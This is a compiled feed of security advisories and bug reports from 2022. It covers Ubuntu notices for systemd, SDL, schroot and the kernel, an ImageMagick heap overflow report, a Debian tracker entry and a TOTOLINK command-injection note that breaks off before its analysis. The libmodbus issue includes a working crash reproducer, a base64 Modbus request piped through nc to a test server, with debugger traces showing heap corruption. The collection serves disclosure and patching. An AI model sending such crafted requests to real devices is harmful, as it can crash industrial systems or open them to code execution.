Ubuntu Security Notice 5583-1 - It was discovered that systemd incorrectly handled certain DNS requests, which leads to user-after-free vulnerability. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5583-1August 29, 2022systemd vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:systemd could be made to crash or run programs if it received speciallycrafted DNS request.Software Description:- systemd: system and service managerDetails:It was discovered that systemd incorrectly handled certain DNS requests,which leads to user-after-free vulnerability. An attacker could possibly usethis issue to cause a crash or execute arbitrary code. (CVE-2022-2526)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:  systemd                         237-3ubuntu10.54In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5583-1  CVE-2022-2526Package Information:  https://launchpad.net/ubuntu/+source/systemd/237-3ubuntu10.54

Ubuntu Security Notice USN-5583-1

Ubuntu Security Notice 5586-1 - It was discovered that SDL incorrectly handled memory. An attacker could potentially use this issue to cause a denial of service or other unexpected behavior.

    ==========================================================================Ubuntu Security Notice USN-5586-1August 29, 2022libsdl1.2 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:SDL could be made to crash or behave unexpectedly.Software Description:- libsdl1.2: Simple DirectMedia LayerDetails:It was discovered that SDL (Simple DirectMedia Layer) incorrectly handled memory. An attacker could potentially use this issue to causea denial of service or other unexpected behavior.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libsdl1.2debian                 1.2.15+dfsg1-3ubuntu0.1+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5586-1   CVE-2022-34568

Ubuntu Security Notice USN-5586-1

Aaron Adams discovered that the netfilter subsystem in the Linux kernel did not properly handle the removal of stateful expressions in some situations, leading to a use-after-free vulnerability. Ziming Zhang discovered that the netfilter subsystem in the Linux kernel did not properly validate sets with multiple ranged fields. It was discovered that the implementation of POSIX timers in the Linux kernel did not properly clean up timers in some situations. Various other vulnerabilities were also discovered.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 ESM  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems  
-   linux-oem - Linux kernel for OEM systems

Details

Aaron Adams discovered that the netfilter subsystem in the Linux kernel  
did not properly handle the removal of stateful expressions in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-1966)

Ziming Zhang discovered that the netfilter subsystem in the Linux kernel  
did not properly validate sets with multiple ranged fields. A local  
attacker could use this to cause a denial of service or execute  
arbitrary code. (CVE-2022-1972)

It was discovered that the implementation of POSIX timers in the Linux  
kernel did not properly clean up timers in some situations. A local  
attacker could use this to cause a denial of service (system crash) or  
execute arbitrary code. (CVE-2022-2585)

It was discovered that the netfilter subsystem of the Linux kernel did  
not prevent one nft object from referencing an nft set in another nft  
table, leading to a use-after-free vulnerability. A local attacker could  
use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-2586)

Zhenpeng Lin discovered that the network packet scheduler implementation  
in the Linux kernel did not properly remove all references to a route  
filter before freeing it in some situations. A local attacker could use  
this to cause a denial of service (system crash) or execute arbitrary  
code. (CVE-2022-2588)

It was discovered that the Linux kernel did not properly restrict access  
to the kernel debugger when booted in secure boot environments. A  
privileged attacker could use this to bypass UEFI Secure Boot  
restrictions. (CVE-2022-21499)

Kyle Zeng discovered that the Network Queuing and Scheduling subsystem  
of the Linux kernel did not properly perform reference counting in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-29581)

Arthur Mongodin discovered that the netfilter subsystem in the Linux  
kernel did not properly perform data validation. A local attacker could  
use this to escalate privileges in certain situations. (CVE-2022-34918)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 89.1  
    azure - 89.1  
    azure - 89.2  
    gcp - 89.1  
    generic - 89.1  
    generic - 89.2  
    gke - 89.1  
    gke - 89.2  
    gkeop - 89.1  
    ibm - 89.1  
    lowlatency - 89.1

Ubuntu 18.04 LTS  
    aws - 89.1  
    azure - 89.1  
    gcp - 89.1  
    generic - 89.1  
    gke - 89.1  
    gke - 89.2  
    gkeop - 89.1  
    gkeop - 89.2  
    ibm - 89.1  
    lowlatency - 89.1  
    oem - 89.1

Ubuntu 16.04 ESM  
    aws - 89.1  
    azure - 89.1  
    gcp - 89.1  
    generic - 89.1  
    lowlatency - 89.1  
    lowlatency - 89.2

Ubuntu 22.04 LTS  
    aws - 89.1  
    azure - 89.1  
    gcp - 89.1  
    generic - 89.1  
    gke - 89.1  
    ibm - 89.1  
    lowlatency - 88.1

Ubuntu 14.04 ESM  
    generic - 89.1  
    lowlatency - 89.1

Support Information

Kernels older than the levels listed below do not receive livepatch  
updates. If you are running a kernel version earlier than the one listed  
below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS  
    linux-aws-5.15 - 5.15.0-1000  
    linux-aws - 5.4.0-1009  
    linux-azure-5.15 - 5.15.0-1069  
    linux-azure - 5.4.0-1010  
    linux-gcp-5.15 - 5.15.0-1000  
    linux-gcp - 5.4.0-1009  
    linux-gke-5.15 - 5.15.0-1000  
    linux-gke - 5.4.0-1033  
    linux-gkeop - 5.4.0-1009  
    linux-hwe - 5.15.0-0  
    linux-ibm-5.15 - 5.15.0-1000  
    linux-ibm - 5.4.0-1009  
    linux-oem - 5.4.0-26  
    linux - 5.4.0-26

Ubuntu 18.04 LTS  
    linux-aws-5.4 - 5.4.0-1069  
    linux-aws - 4.15.0-1054  
    linux-azure-4.15 - 4.15.0-1115  
    linux-azure-5.4 - 5.4.0-1069  
    linux-gcp-4.15 - 4.15.0-1121  
    linux-gcp-5.4 - 5.4.0-1069  
    linux-gke-4.15 - 4.15.0-1076  
    linux-gke-5.4 - 5.4.0-1009  
    linux-gkeop-5.4 - 5.4.0-1007  
    linux-hwe-5.4 - 5.4.0-26  
    linux-ibm-5.4 - 5.4.0-1009  
    linux-oem - 4.15.0-1063  
    linux - 4.15.0-69

Ubuntu 16.04 ESM  
    linux-aws-hwe - 4.15.0-1126  
    linux-aws - 4.4.0-1098  
    linux-azure - 4.15.0-1063  
    linux-gcp - 4.15.0-1118  
    linux-hwe - 4.15.0-69  
    linux - 4.4.0-168  
    linux - 4.4.0-211

Ubuntu 22.04 LTS  
    linux-aws - 5.15.0-1000  
    linux-azure - 5.15.0-1000  
    linux-gcp - 5.15.0-1000  
    linux-gke - 5.15.0-1000  
    linux-ibm - 5.15.0-1000  
    linux - 5.15.0-24  
    linux - 5.15.0-25

Ubuntu 14.04 ESM  
    linux-lts-xenial - 4.4.0-168

References

-   CVE-2022-1966  
-   CVE-2022-1972  
-   CVE-2022-2585  
-   CVE-2022-2586  
-   CVE-2022-2588  
-   CVE-2022-21499  
-   CVE-2022-29581  
-   CVE-2022-34918

Kernel Live Patch Security Notice LSN-0089-1

Ubuntu Security Notice 5584-1 - It was discovered that Schroot incorrectly handled certain Schroot names. An attacker could possibly use this issue to break schroot's internal state causing a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5584-1  
August 29, 2022

schroot vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Schroot could be made to denial of service if certain  
schroot names are used.

Software Description:  
- schroot: Execute commands in a chroot environment

Details:

It was discovered that Schroot incorrectly handled certain Schroot names.  
An attacker could possibly use this issue to break schroot's internal  
state causing a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  schroot                         1.6.10-12ubuntu3.1

Ubuntu 20.04 LTS:  
  schroot                         1.6.10-9ubuntu0.1

Ubuntu 18.04 LTS:  
  schroot                         1.6.10-4ubuntu0.1

Ubuntu 16.04 ESM:  
  schroot                         1.6.10-1ubuntu3+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5584-1  
  CVE-2022-2787

Package Information:  
  https://launchpad.net/ubuntu/+source/schroot/1.6.10-12ubuntu3.1  
  https://launchpad.net/ubuntu/+source/schroot/1.6.10-9ubuntu0.1  
  https://launchpad.net/ubuntu/+source/schroot/1.6.10-4ubuntu0.1

Ubuntu Security Notice USN-5584-1

A heap-buffer-overflow flaw was found in ImageMagick’s PushShortPixel() function of quantum-private.h file. This vulnerability is triggered when an attacker passes a specially crafted TIFF image file to ImageMagick for conversion, potentially leading to a denial of service.

**ImageMagick version**

7.1.0-28

**Operating system**

Linux

**Operating system, version and so on**

OS: Ubuntu 20.04.3 LTS  
Version: ImageMagick 7.1.0-28 Q16-HDRI x86\_64 2022-03-04 https://imagemagick.org  
Copyright: (C) 1999 ImageMagick Studio LLC  
License: https://imagemagick.org/script/license.php  
Features: Cipher DPC HDRI  
Delegates (built-in): bzlib fontconfig freetype jbig jng jpeg lzma pangocairo png tiff x xml zlib  
Compiler: gcc (4.2)

**Description**

Hello,  
We found a heap overflow vulnerability in magick

**Steps to Reproduce**

build it  
CC=afl-clang-lto CXX=afl-clang-lto++ CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" ./configure --disable-shared --prefix="/root/fuzz/target/imagemagick/ImageMagick/install"

AFL_USE_ASAN=1 make -j24 && make install -j24

run it  
./magick convert poc /dev/null  
output

\=================================================================  
\==1195823==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000181c at pc 0x000000cd5328 bp 0x7ffdacd61fa0 sp 0x7ffdacd61f98  
READ of size 1 at 0x61900000181c thread T0  
#0 0xcd5327 in PushShortPixel /root/fuzz/target/image\_magick/ImageMagick/./MagickCore/quantum-private.h  
#1 0xcd5327 in ImportRGBAQuantum /root/fuzz/target/image\_magick/ImageMagick/MagickCore/quantum-import.c:4232:15  
#2 0xcd5327 in ImportQuantumPixels /root/fuzz/target/image\_magick/ImageMagick/MagickCore/quantum-import.c:4780:7  
#3 0x13e73f2 in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:2052:24  
#4 0x6f9981 in ReadImage /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:728:15  
#5 0x6fe991 in ReadImages /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:1075:9  
#6 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18  
#7 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14  
#8 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10  
#9 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10  
#10 0x7f499b68b0b2 in \_\_libc\_start\_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16  
#11 0x4ce36d in \_start (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x4ce36d)

0x61900000181c is located 10 bytes to the right of 914-byte region \[0x619000001480,0x619000001812)  
allocated by thread T0 here:  
#0 0x54ab1d in malloc (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x54ab1d)  
#1 0x13e6faf in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:1996:39  
#2 0x6f9981 in ReadImage /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:728:15  
#3 0x6fe991 in ReadImages /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:1075:9  
#4 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18  
#5 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14  
#6 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10  
#7 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10  
#8 0x7f499b68b0b2 in \_\_libc\_start\_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/fuzz/target/image\_magick/ImageMagick/./MagickCore/quantum-private.h in PushShortPixel  
Shadow bytes around the buggy address:  
0x0c327fff82b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
\=>0x0c327fff8300: 00 00 02\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
\==1195823==ABORTING

**Images**

poc.zip

CVE-2022-1115: heap-buffer-overflow in magick at quantum-private.h PushShortPixel · Issue #4974 · ImageMagick/ImageMagick

A heap-based buffer overflow flaw was found in libmodbus in function modbus_reply() in src/modbus.c.

**libmodbus version**

ebc4f47

**OS and/or distribution**

Ubuntu 20.04 focal

**Environment**

,AMD EPYC 7742 64-Core @ 16x 2.25GHz

**Description**

Heap-based Buffer Overflow in \_modbus\_receive\_msg

**Expected behaviour**

no crash.

**Actual behaviour**

double free or corruption (!prev)

**Steps to reproduce the behavior (commands or source code)**

libmodbus/tests/unit-test-server.c

    ./unit-test-server
    echo "A90AAAAN/xcBYgABAIQAAQLXEQ==" | base64 -d | nc 127.0.0.1 1502
    

    pwndbg> c
    Continuing.
    The client connection from 127.0.0.1 is accepted
    Waiting for an indication...
    <03><DD><00><00><00><0D><FF><17><01><62><00><01><00><84><00><01><02><D7><11>
    
    Breakpoint 3, modbus_reply (ctx=0x5555555592a0, req=0x555555559320 <incomplete sequence \335>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:979
    979                      i < mapping_address_write + nb_write; i++, j += 2) {
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
    *RAX  0x8
    *RBX  0x7
    *RCX  0x555555559430 ◂— 0x13000000025 /* '%' */
    *RDX  0x2
    *RDI  0x7fffffffde64 ◂— 0x17000000ff
    *RSI  0x7fffffffde70 ◂— 0x17ff7fff0000dd03
    *R8   0x0
    *R9   0x0
    *R10  0x2
    *R11  0xffffff24
    *R12  0xff
    *R13  0x5555555592a0 ◂— 0x4000000ff
    *R14  0x9
    *R15  0x7fffffffde70 ◂— 0x17ff7fff0000dd03
    *RBP  0x555555559320 ◂— 0x17ff0d000000dd03
    *RSP  0x7fffffffde20 ◂— 0x3
    *RIP  0x7ffff7fbda62 (modbus_reply+1250) ◂— jle    0x7ffff7fbdaa1
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7fbda62 <modbus_reply+1250>    jle    modbus_reply+1313                <modbus_reply+1313>
    
       0x7ffff7fbda64 <modbus_reply+1252>    mov    r8d, dword ptr [rsp + 0x34]
       0x7ffff7fbda69 <modbus_reply+1257>    movsxd rdi, r11d
       0x7ffff7fbda6c <modbus_reply+1260>    lea    rdx, [rbx + 2]
       0x7ffff7fbda70 <modbus_reply+1264>    add    rdi, rdi
       0x7ffff7fbda73 <modbus_reply+1267>    sub    rdi, rbx
       0x7ffff7fbda76 <modbus_reply+1270>    lea    rsi, [rdx + r8*2]
       0x7ffff7fbda7a <modbus_reply+1274>    add    rdi, qword ptr [rcx + 0x38]
       0x7ffff7fbda7e <modbus_reply+1278>    jmp    modbus_reply+1284                <modbus_reply+1284>
        ↓
       0x7ffff7fbda84 <modbus_reply+1284>    movzx  eax, byte ptr [rbp + rbx + 0xa]
       0x7ffff7fbda89 <modbus_reply+1289>    movzx  r8d, byte ptr [rbp + rbx + 0xb]
    ──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
    In file: /home/aidai/fuzzing/libmodbus/test/libmodbus/src/modbus.c
       974             rsp[rsp_length++] = nb << 1;
       975
       976             /* Write first.
       977                10 and 11 are the offset of the first values to write */
       978             for (i = mapping_address_write, j = 10;
     ► 979                  i < mapping_address_write + nb_write; i++, j += 2) {
       980                 mb_mapping->tab_registers[i] =
       981                     (req[offset + j] << 8) + req[offset + j + 1];
       982             }
       983
       984             /* and read the data for the response */
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffffde20 ◂— 0x3
    01:0008│     0x7fffffffde28 ◂— 0x5555ffffff25
    02:0010│     0x7fffffffde30 ◂— 0x7fff00000008
    03:0018│     0x7fffffffde38 ◂— 0x8
    04:0020│     0x7fffffffde40 ◂— 0x200000001
    05:0028│     0x7fffffffde48 —▸ 0x555555559430 ◂— 0x13000000025 /* '%' */
    06:0030│     0x7fffffffde50 ◂— 0xffffff24
    07:0038│     0x7fffffffde58 ◂— 0x1300000000
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7fbda62 modbus_reply+1250
       f 1   0x555555555734 main+692
       f 2   0x7ffff7dd80b3 __libc_start_main+243
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  modbus_reply (ctx=0x5555555592a0, req=0x555555559320 <incomplete sequence \335>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:979
    #1  0x0000555555555734 in main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe128) at unit-test-server.c:183
    #2  0x00007ffff7dd80b3 in __libc_start_main (main=0x555555555480 <main>, argc=1, argv=0x7fffffffe128, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe118) at ../csu/libc-start.c:308
    #3  0x0000555555555a0e in _start ()
    pwndbg> x/10gx 0x555555559310-0x10
    0x555555559300: 0x000005de00000000      0x2e302e302e373231
    0x555555559310: 0x0000000000000031      0x0000000000000111
    0x555555559320: 0x17ff0d000000dd03      0x0100840001006201
    0x555555559330: 0x000000000011d702      0x0000000000000000
    0x555555559340: 0x0000000000000000      0x0000000000000000
    pwndbg> c
    Continuing.
    
    Hardware watchpoint 2: *0x555555559318
    
    Old value = 273
    New value = 55057
    modbus_reply (ctx=0x5555555592a0, req=0x555555559320 <incomplete sequence \335>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:979
    979                      i < mapping_address_write + nb_write; i++, j += 2) {
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
    *RAX  0xd711
     RBX  0x7
     RCX  0x555555559430 ◂— 0x13000000025 /* '%' */
    *RDX  0x9
    *RDI  0x555555559311 ◂— 0x1100000000000000
    *RSI  0x9
    *R8   0x11
     R9   0x0
     R10  0x2
     R11  0xffffff24
     R12  0xff
     R13  0x5555555592a0 ◂— 0x4000000ff
     R14  0x9
     R15  0x7fffffffde70 ◂— 0x17ff7fff0000dd03
     RBP  0x555555559320 ◂— 0x17ff0d000000dd03
     RSP  0x7fffffffde20 ◂— 0x3
    *RIP  0x7ffff7fbda99 (modbus_reply+1305) ◂— mov    rbx, rdx
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
       0x7ffff7fbda84 <modbus_reply+1284>    movzx  eax, byte ptr [rbp + rbx + 0xa]
       0x7ffff7fbda89 <modbus_reply+1289>    movzx  r8d, byte ptr [rbp + rbx + 0xb]
       0x7ffff7fbda8f <modbus_reply+1295>    shl    eax, 8
       0x7ffff7fbda92 <modbus_reply+1298>    add    eax, r8d
       0x7ffff7fbda95 <modbus_reply+1301>    mov    word ptr [rdi + rbx], ax
     ► 0x7ffff7fbda99 <modbus_reply+1305>    mov    rbx, rdx
       0x7ffff7fbda9c <modbus_reply+1308>    cmp    rsi, rdx
       0x7ffff7fbda9f <modbus_reply+1311>    jne    modbus_reply+1280                <modbus_reply+1280>
    
       0x7ffff7fbdaa1 <modbus_reply+1313>    cmp    dword ptr [rsp], r10d
       0x7ffff7fbdaa5 <modbus_reply+1317>    jle    modbus_reply+239                <modbus_reply+239>
    
       0x7ffff7fbdaab <modbus_reply+1323>    mov    rdx, qword ptr [rcx + 0x38]
    ──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
    In file: /home/aidai/fuzzing/libmodbus/test/libmodbus/src/modbus.c
       974             rsp[rsp_length++] = nb << 1;
       975
       976             /* Write first.
       977                10 and 11 are the offset of the first values to write */
       978             for (i = mapping_address_write, j = 10;
     ► 979                  i < mapping_address_write + nb_write; i++, j += 2) {
       980                 mb_mapping->tab_registers[i] =
       981                     (req[offset + j] << 8) + req[offset + j + 1];
       982             }
       983
       984             /* and read the data for the response */
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffffde20 ◂— 0x3
    01:0008│     0x7fffffffde28 ◂— 0x5555ffffff25
    02:0010│     0x7fffffffde30 ◂— 0x7fff00000008
    03:0018│     0x7fffffffde38 ◂— 0x8
    04:0020│     0x7fffffffde40 ◂— 0x200000001
    05:0028│     0x7fffffffde48 —▸ 0x555555559430 ◂— 0x13000000025 /* '%' */
    06:0030│     0x7fffffffde50 ◂— 0xffffff24
    07:0038│     0x7fffffffde58 ◂— 0x1300000000
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7fbda99 modbus_reply+1305
       f 1   0x555555555734 main+692
       f 2   0x7ffff7dd80b3 __libc_start_main+243
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> x/10gx 0x555555559310-0x10
    0x555555559300: 0x000005de00000000      0x2e302e302e373231
    0x555555559310: 0x0000000000000031      0x000000000000d711
    0x555555559320: 0x17ff0d000000dd03      0x0100840001006201
    0x555555559330: 0x000000000011d702      0x0000000000000000
    0x555555559340: 0x0000000000000000      0x0000000000000000
    pwndbg> heap
    Allocated chunk | PREV_INUSE
    Addr: 0x555555559000
    Size: 0x291
    
    Allocated chunk | PREV_INUSE
    Addr: 0x555555559290
    Size: 0x61
    
    Allocated chunk | PREV_INUSE
    Addr: 0x5555555592f0
    Size: 0x21
    
    Allocated chunk | PREV_INUSE
    Addr: 0x555555559310
    Size: 0xd711
    
    Allocated chunk
    Addr: 0x555555566a20
    Size: 0x00
    

then, ctrl+c close the nc.

    pwndbg> c
    Continuing.
    [03][DD][00][00][00][05][FF][17][02][00][00]
    Waiting for an indication...
    ERROR Connection reset by peer: read
    Quit the loop: Connection reset by peer
    double free or corruption (!prev)
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
    *RAX  0x0
    *RBX  0x7ffff7dae740 ◂— 0x7ffff7dae740
    *RCX  0x7ffff7df718b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    *RDX  0x0
    *RDI  0x2
    *RSI  0x7fffffffdbd0 ◂— 0x0
    *R8   0x0
    *R9   0x7fffffffdbd0 ◂— 0x0
    *R10  0x8
    *R11  0x246
    *R12  0x7fffffffde40 ◂— 0x2
    *R13  0x10
    *R14  0x7ffff7ffb000 ◂— 0x62756f6400001000
    *R15  0x1
    *RBP  0x7fffffffdf20 —▸ 0x7ffff7f9cb80 (main_arena) ◂— 0x0
    *RSP  0x7fffffffdbd0 ◂— 0x0
    *RIP  0x7ffff7df718b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7df718b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7df7193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff7df719c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff7df71c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff7df71c9                nop    dword ptr [rax]
       0x7ffff7df71d0 <killpg>       endbr64
       0x7ffff7df71d4 <killpg+4>     test   edi, edi
       0x7ffff7df71d6 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff7df71d8 <killpg+8>     neg    edi
       0x7ffff7df71da <killpg+10>    jmp    kill                <kill>
    
       0x7ffff7df71df <killpg+15>    nop
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffffdbd0 ◂— 0x0
    01:0008│            0x7fffffffdbd8 ◂— 0x0
    02:0010│            0x7fffffffdbe0 ◂— 0x2f2f2f2f2f2f2f2f ('////////')
    03:0018│            0x7fffffffdbe8 —▸ 0x7ffff7dc61e0 ◂— 0x10001200001694
    04:0020│            0x7fffffffdbf0 —▸ 0x7fffffffdf90 —▸ 0x5555555592a0 ◂— 0x4000000ff
    05:0028│            0x7fffffffdbf8 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
    06:0030│            0x7fffffffdc00 ◂— 0x0
    07:0038│            0x7fffffffdc08 —▸ 0x7ffff7ec2987 (close+23) ◂— cmp    rax, -0x1000 /* 'H=' */
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7df718b raise+203
       f 1   0x7ffff7dd6859 abort+299
       f 2   0x7ffff7e413ee __libc_message+670
       f 3   0x7ffff7e4947c
       f 4   0x7ffff7e4b12c _int_free+1900
       f 5   0x555555555783 main+771
       f 6   0x7ffff7dd80b3 __libc_start_main+243
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg>
    

**libmodbus output with debug mode enabled**

    ./unit-test-server
    The client connection from 127.0.0.1 is accepted
    Waiting for an indication...
    <03><DD><00><00><00><0D><FF><17><01><62><00><01><00><84><00><01><02><D7><11>
    [03][DD][00][00][00][05][FF][17][02][00][00]
    Waiting for an indication...
    ERROR Connection reset by peer: read
    Quit the loop: Connection reset by peer
    double free or corruption (!prev)
    [1]    3966417 abort      ./unit-test-server

CVE-2022-0367: Heap-based Buffer Overflow in modbus_reply · Issue #614 · stephane/libmodbus

A flaw was found in python-oslo-utils. Due to improper parsing, passwords with a double quote ( " ) in them cause incorrect masking in debug logs, causing any part of the password after the double quote to be plaintext.

**Name**

CVE-2022-0718

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub advisories/code/issues, web search, more)

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

python-oslo.utils (PTS)

buster

3.36.5-0+deb10u1

vulnerable

bullseye

4.6.0-2

vulnerable

bookworm, sid

4.12.3-1

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

python-oslo.utils

source

(unstable)

4.10.1-1

**Notes**

\[bullseye\] - python-oslo.utils <no-dsa> (Minor issue)  
https://bugzilla.redhat.com/show\_bug.cgi?id=2056850  
https://bugs.launchpad.net/oslo.utils/+bug/1949623  
Fixed by: https://opendev.org/openstack/oslo.utils/commit/6e17ae1f7959c64dfd20a5f67edf422e702426aa (4.12.1)  
Fixed by: https://opendev.org/openstack/oslo.utils/commit/5ce8a7f0f8ecec7a85a23ec3d7a7fb1cad14ceba (4.10.1)

CVE-2022-0718: CVE-2022-0718

TOTOLINK A810R V5.9c.4050_B20190424 was discovered to contain a command injection vulnerability via the component downloadFile.cgi.

Permalink

Cannot retrieve contributors at this time

**command injection****A810R\_Firmware**

version: V5.9c.4050\_B20190424

**Description:**

There is a command injection in downloadFile.cgi. Still exist in V5.9c.4050\_B20190424.

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**Analyse:**

